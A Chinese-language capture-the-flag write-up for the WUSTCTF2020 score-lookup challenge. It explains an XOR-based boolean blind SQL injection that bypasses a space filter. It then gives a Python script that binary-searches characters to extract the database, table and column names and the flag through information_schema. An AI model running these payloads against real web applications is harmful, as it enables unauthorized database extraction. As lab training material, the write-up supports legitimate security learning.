[WUSTCTF2020]颜值成绩查询

输入1看看
明显sql注入题目，我测试了下，最多只能输到4，然后我用了下别的sql语句都不行
我试试异或1^1^1

可以查询到，插入sql语句，（这题其实过滤了空格，因为我之前做过类似的题目我就没测试啥了）

1^(ascii(substr((select(database())),1,1))>200)^1

大于200就查询不到了，明显的布尔盲注
不多说了，详情参看极客大挑战finalsql
注意一点 flag在value里不是在flag字段里

我就直接放exp吧

import requests

url= 'http://b91f52c4-276b-4113-9ede-54fb712ac6da.node3.buuoj.cn/'

database =""

payload1 = "?stunum=1^(ascii(substr((select(database())),{},1))>{})^1" #库名为ctf
payload2 = "?stunum=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')),{},1))>{})^1"#表名为flag,score
payload3 ="?stunum=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),{},1))>{})^1" #列名为flag,value
payload4 = "?stunum=1^(ascii(substr((select(group_concat(value))from(ctf.flag)),{},1))>{})^1" #
for i in range(1,10000):
    low = 32
    high = 128
    mid =(low + high) // 2
    while(low < high):
        # payload = payload1.format(i,mid)  #查库名
        # payload = payload2.format(i,mid)  #查表名
        # payload = payload3.format(i,mid)  #查列名
        payload = payload4.format(i,mid) #查flag

        new_url = url + payload
        r = requests.get(new_url)
        print(new_url)
        if "Hi admin, your score is: 100" in r.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) //2
    if (mid == 32 or mid == 132):
        break
    database +=chr(mid)
    print(database)

print(database)